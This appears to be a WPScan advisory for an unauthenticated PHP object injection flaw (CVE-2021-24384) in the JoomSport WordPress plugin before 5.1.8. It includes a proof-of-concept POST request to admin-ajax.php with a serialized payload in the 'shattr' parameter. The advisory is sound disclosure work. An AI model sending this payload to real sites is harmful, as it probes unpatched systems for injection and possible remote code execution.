JoomSport < 5.1.8 - Unauthenticated PHP Object Injection

Description

The joomsport_md_load AJAX action of the plugin, registered for both unauthenticated and unauthenticated users, unserialised user input from the shattr POST parameter, leading to a PHP Object Injection issue. Even though the plugin does not have a suitable gadget chain to exploit this, other installed plugins could, which might lead to more severe issues such as RCE

Proof of Concept

POST /wp-admin/admin-ajax.php
[...]

action=joomsport_md_load&mdId=1&shattr=Tzo0OiJURVNUIjowOnt9

Affects Plugins

joomsport-sports-league-results-management

Fixed in version 5.1.8✓

References

CVE

CVE-2021-24384

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CWE-502

Miscellaneous

Original Researcher

Bugbang

Submitter

Bugbang

Submitter twitter

xBugBang

Verified

Yes

WPVDB ID

fb6c407c-713c-4e83-92ce-4e5f791be696

Timeline

Publicly Published

2021-06-08 (about 4 months ago)

Added

2021-06-08 (about 4 months ago)

Last Updated

2021-06-08 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin